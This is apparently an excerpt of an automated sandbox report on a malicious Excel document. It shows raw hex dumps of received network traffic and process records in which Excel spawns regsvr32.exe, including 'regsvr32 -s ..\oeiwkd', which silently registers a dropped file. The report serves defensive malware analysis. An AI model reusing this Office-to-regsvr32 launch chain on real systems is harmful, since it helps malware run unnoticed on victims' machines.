              Data Ascii: "q!pt8&{/&x{$Fopd!IhN/ @`(XSM}Km(i\`x}IdTnslZ2Z$Qf#'zt]@DI ;ou'2AN!&S/_0.kY rmBA-T8GDK
              Apr 6, 2021 18:01:05.779380083 CEST11INData Raw: b0 ba 11 5f 6f 4e ac ae 83 7f db 41 ca f3 a2 34 48 cf 1f 6b 23 ab 75 06 04 4b 97 b5 34 02 0d 73 38 98 fa 6c 51 0e 46 91 42 8e 3f b7 79 40 39 13 44 4d 79 37 8f 81 38 1b 9e a5 1b 52 62 14 eb 76 23 ed 4b 4c f7 20 ca cb 35 84 1c 50 6d dc e6 fd d9 05
              Data Ascii: _oNA4Hk#uK4s8lQFB?y@9DMy78Rbv#KL 5Pml{;nEC5w&qOB@j(R& ay/hG$zBnupiude}6Klb|HYDENu6l
              Apr 6, 2021 18:01:05.779418945 CEST13INData Raw: d0 c6 71 11 1c c9 c6 b7 c4 73 e7 e0 fd a6 6f c1 69 fc da d8 ea d6 8d 20 e0 ae ac c9 8d b8 d0 15 f4 4f 5b a4 cf 49 c3 a6 fc 18 ea f1 08 3e 98 ee d3 e7 83 26 53 7e 18 9b 6a 71 f9 d6 84 e1 65 20 19 81 ee 89 16 3c 45 69 de e2 dc ef a0 65 b9 80 99 72
              Data Ascii: qsoi O[I>&S~jqe <EierYOy[zH-Ap}r|==%qbbu.trb_E~|17pL?+>7tO"D*US4~]B!+\SVIasMiu
              Apr 6, 2021 18:01:05.779468060 CEST14INData Raw: 1d 8e f6 6b 6d 8a 1d 79 7c bc 8d f4 97 9a b5 40 c9 4e cc b6 16 71 f8 60 bf 3f 7b c5 60 5c d4 b8 db 14 77 95 1c 1d 7d 3f 64 8c 68 63 b8 d8 71 17 73 1f 36 64 ba 42 b4 99 de 8a 8a 7c a8 0f cf 5c 99 67 66 ba ea b2 92 65 a9 dc 32 9a e2 aa 7c 98 75 7f
              Data Ascii: kmy|@Nq`?{`\w}?dhcqs6dB|\gfe2|u_~>?YtT-v_-D|"OGYZ}Zpa %CGC`Ri~pDkm399hApX`5}@96}m<g
              Apr 6, 2021 18:01:05.779510975 CEST15INData Raw: bf 14 9a 4a e5 9b 21 6e dd 5a ab 08 4f 7c a2 92 3d 6e 75 7c 85 9e 21 98 bd 13 79 9e 6c 5c ec 78 31 34 31 ad 45 94 65 41 a2 2e 75 9b d0 eb bd 39 00 2c 9b 7d 57 75 dc 3f 37 0f 53 f2 b4 08 16 00 af 05 4a 8e 8d 5d 35 cd 61 73 ba 07 2e 80 0d 97 96 ab
              Data Ascii: J!nZO|=nu|!yl\x141EeA.u9,}Wu?7SJ]5as.m(+<ylY)aJT_KzYQ169aGH[Yz!.tUt*$(0W29}5onL)neY ^$)g,YCD&~3ZSM|de
              Apr 6, 2021 18:01:05.779550076 CEST17INData Raw: 85 07 da 13 bb ce 59 4a 71 77 2d 74 00 92 2e b0 11 76 bf 64 ca f4 f9 a0 d2 8c 1e e1 6f b0 07 63 07 36 7e 54 6e 83 ae a2 d9 7f 5e 02 15 0b 24 c1 2f 3f 07 e9 61 71 f9 e1 b7 be 1c 04 dc 98 61 de b7 29 ee 41 94 c9 f0 a5 0d dd c3 5a c6 2b 29 87 04 71
              Data Ascii: YJqw-t.vdoc6~Tn^$/?aqa)AZ+)qG7,?1vg$;1$7cX?wjE!C!l7|`MIa&T>>:K[A|7HvU(?r4S3`,7o>"ZKz(n
              Apr 6, 2021 18:01:05.779589891 CEST18INData Raw: 02 00 35 e2 70 8a 77 64 af 48 d8 5d c2 1e cc d3 08 7d 2f c6 e9 81 88 f0 a7 97 07 57 8a 40 5d 27 b0 e8 52 b7 55 b4 86 50 34 99 eb 38 97 72 8c cf 85 0b 24 44 04 c7 e6 c1 39 84 9c 3b 7a 6a 74 99 65 7a 50 24 44 fa c2 f8 66 3f 30 84 7c ec 7d cb 9b 63
              Data Ascii: 5pwdH]}/W@]'RUP48r$D9;zjtezP$Df?0|}c#dbsDTDSK}.[Jh9}]Z!" w!] !>'[clKw.'uW",+Y:=WbvKD*R7/6.QR.+HvaDAzboFCd
              Apr 6, 2021 18:01:05.779630899 CEST20INData Raw: 2d c7 1e 12 e8 c2 f7 08 7d 33 dc 84 77 db 74 b5 7c 38 e2 d0 75 3f a6 b5 38 2c e2 c0 29 43 a8 37 8d b7 91 6e b5 d5 29 67 19 0f 10 f6 0f a6 2b f1 14 27 90 12 db 28 74 b2 d9 76 cc 8b 89 79 e9 e9 63 7a 41 1b 8f d2 fe a9 36 c2 32 b6 8e d9 de 21 50 21
              Data Ascii: -}3wt|8u?8,)C7n)g+'(tvyczA62!P!We $+256.W,$do3mR<3<-dMmxI:4}=(%G zT^viP),*'y'..pn\'rk]qQ(IO-KG
              Apr 6, 2021 18:01:05.949870110 CEST21INData Raw: f8 24 25 05 21 44 2d 8e 7a 5e 9b 66 e9 dd 10 a2 01 01 35 19 d2 c6 81 72 54 2f 74 94 22 57 44 bb fb e8 e6 f1 3a e9 29 82 84 be 38 ce 1d c0 a5 4f 45 6f c3 a6 d7 95 0b 39 5b 60 f8 62 f8 b8 f8 01 34 31 37 45 ac b3 cc ed 11 30 d9 54 77 54 82 29 b4 13
              Data Ascii: $%!D-z^f5rT/t"WD:)8OEo9[`b417E0TwT)f<qAQAEt@i(p8o,m-B rqvy<&$;8emy5|$|$7wYv4(Fp^{IZ{:EHEL


              Code Manipulations

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:18:00:34
              Start date:06/04/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f6c0000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:00:41
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32 -s ..\oeiwkd
              Imagebase:0xff990000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:00:41
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32 -s
              Imagebase:0xff990000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:00:41
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32 -s
              Imagebase:0xff990000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:00:42
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32 -s
              Imagebase:0xff990000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:18:00:42
              Start date:06/04/2021
              Path:C:\Windows\System32\regsvr32.exe
              Wow64 process (32bit):false
              Commandline:regsvr32 -s
              Imagebase:0xff990000
              File size:19456 bytes
              MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Disassembly

              Code Analysis

              Reset < >